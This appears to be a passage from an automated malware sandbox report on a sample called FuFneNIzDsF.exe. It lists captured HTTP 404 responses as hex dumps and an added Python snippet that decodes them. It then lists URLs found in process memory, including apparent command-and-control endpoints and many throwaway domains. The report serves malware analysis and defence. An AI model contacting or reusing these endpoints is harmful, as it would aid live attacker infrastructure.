29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:10 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 
29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:42:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:42:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: (identical to the 07:42:17 response above)
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:42:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: (identical to the 07:42:17 response above)
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:42:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Originset-cookie: locale=en-us; path=/; max-age=31557600; expires=Thu, 06 Nov 2025 13:42:52 GMTx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-download-options: noopenstrict-transport-security: max-age=31536000; includeSubdomainsx-frame-options: SAMEORIGINcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntPc25kEmC1ajuXatwuxMIq6piB7pNnnQ65qnRVu8s%2BGHY2NrPrkq7aSPYtKLT1tQ93dfg%2Fu8SmpG9zppjvFcsygWpBA6OxSDM7SArddCEF%2BbMRzij2I9JzTX60x%2FSxj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8de37305bc04e9bd-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=546&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 38 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 7a 68 2d 43 4e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e e5 bd ac e5 b1 95 e5 b0 8f e8 af b4 e7 bd 91 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 Data Ascii: 18f6<!DOCTYPE html><html lang=zh-CN><head><meta charset=UTF-8><meta name=viewport content="width=device-width,initial-scale=1"><title>彬展小说网</title><meta na
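The Data Raw fields of the responses above are hex dumps of the bytes on the wire, cut off by the report at a fixed length. The following Python is an added example, not part of this report or of Joe Sandbox: it turns such a dump back into bytes, peels the chunk-size line of a chunked body, reads the gzip member header of a compressed body and inflates whatever survives, decodes a plain body to text, and reports the declared length against the bytes actually present. The two sample dumps embedded in it are the opening bytes of the 07:42:17 and 07:42:24 nginx responses above; the lone trailing "6" on the second sample is appended here to mimic the half byte the report leaves at the end of a cut-off dump.

```python
"""Decode the 'Data Raw' hex dumps Joe Sandbox prints for captured HTTP responses.

Added example for this report page, not Joe Sandbox code. The sample dumps are
the opening bytes of two of the nginx 404 responses listed in the report, cut
short so the example stays readable.
"""
from __future__ import annotations

import re
import zlib

# Response at 07:42:17: chunked transfer encoding, gzip-compressed body.
HEADERS_CHUNKED_GZIP = (
    "HTTP/1.1 404 Not Found Server: nginx Content-Type: text/html; charset=utf-8 "
    "Transfer-Encoding: chunked Connection: close Content-Encoding: gzip"
)
RAW_CHUNKED_GZIP = "35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3"

# Response at 07:42:24: plain HTML body announced by Content-Length.
# The final lone "6" is constructed to mimic the report's truncated last byte.
HEADERS_PLAIN = (
    "HTTP/1.1 404 Not Found Server: nginx Content-Type: text/html; charset=utf-8 "
    "Content-Length: 2966 Connection: close"
)
RAW_PLAIN = (
    "3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 "
    "3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 "
    "72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 "
    "6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 "
    "74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 "
    "63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e "
    "6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 6"
)

# Operating-system codes from the gzip header (RFC 1952, byte 9).
GZIP_OS = {0: "FAT", 3: "Unix", 7: "Macintosh", 11: "NTFS", 255: "unknown"}


def hex_dump_to_bytes(dump: str) -> bytes:
    """Convert a space-separated hex dump to bytes. Tokens that are not exactly
    two hex digits (the half byte left behind when the report truncates) are dropped."""
    return bytes(int(tok, 16) for tok in dump.split() if re.fullmatch(r"[0-9a-fA-F]{2}", tok))


def strip_first_chunk(body: bytes) -> tuple[int, bytes]:
    """Read the leading chunk-size line of a chunked body and return
    (declared chunk size, the payload that follows, limited to that size)."""
    size_line, sep, rest = body.partition(b"\r\n")
    if not sep:
        raise ValueError("no chunk-size line in body")
    size = int(size_line.split(b";")[0], 16)  # ignore any chunk extension
    return size, rest[:size]


def gzip_header(payload: bytes) -> dict:
    """Parse the fixed 10-byte gzip member header."""
    if len(payload) < 10 or payload[:2] != b"\x1f\x8b":
        raise ValueError("payload does not start with a gzip member")
    return {
        "method": payload[2],                            # 8 = deflate
        "flags": payload[3],
        "mtime": int.from_bytes(payload[4:8], "little"),  # 0 = not recorded
        "os": GZIP_OS.get(payload[9], f"code {payload[9]}"),
    }


def decode_response(headers: str, raw_hex: str) -> dict:
    """Recover what can be recovered from a possibly truncated Data Raw dump."""
    body = hex_dump_to_bytes(raw_hex)
    lower = headers.lower()
    result = {"chunk_size": None, "declared_length": None, "gzip": None,
              "text": "", "truncated": False}

    payload = body
    if "transfer-encoding: chunked" in lower:
        result["chunk_size"], payload = strip_first_chunk(body)
        result["declared_length"] = result["chunk_size"]  # first chunk only
    else:
        match = re.search(r"content-length:\s*(\d+)", lower)
        if match:
            result["declared_length"] = int(match.group(1))
    if result["declared_length"] is not None:
        result["truncated"] = len(payload) < result["declared_length"]

    if "content-encoding: gzip" in lower:
        result["gzip"] = gzip_header(payload)
        # Inflate whatever is present; a cut-off member yields a prefix of the page.
        inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)
        try:
            payload = inflater.decompress(payload)
        except zlib.error:
            payload = b""
    result["text"] = payload.decode("utf-8", errors="replace")
    return result


if __name__ == "__main__":
    for name, hdrs, raw in (("07:42:17", HEADERS_CHUNKED_GZIP, RAW_CHUNKED_GZIP),
                            ("07:42:24", HEADERS_PLAIN, RAW_PLAIN)):
        info = decode_response(hdrs, raw)
        print(name, {k: v for k, v in info.items() if k != "text"})
        print(info["text"][:120])
```

Run as a script it prints the recovered header fields and the start of each body. Fed the full dumps from the report, the compressed response inflates to the first part of the same "Page Not Found" page the plain response shows; with a prefix as short as the one embedded here only the gzip header can be read, which is why the decoder always compares the declared length with the bytes actually present rather than trusting the dump to be complete.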
                Source: FuFneNIzDsF.exe, 00000008.00000002.4571453200.0000000005711000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.econsultoria.online
                Source: FuFneNIzDsF.exe, 00000008.00000002.4571453200.0000000005711000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.econsultoria.online/azb9/
                Source: FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003FB0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000003D34000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.0000000015A54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://34.92.79.175:19817/register
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aiqb.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://anqb.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aqqb.info
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://chqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cpjqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dmqb.info
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://egqb.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://erxs.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://esfqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Exo
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gdlqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gdxs.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gsxs.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gwqqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hgqb.xyz
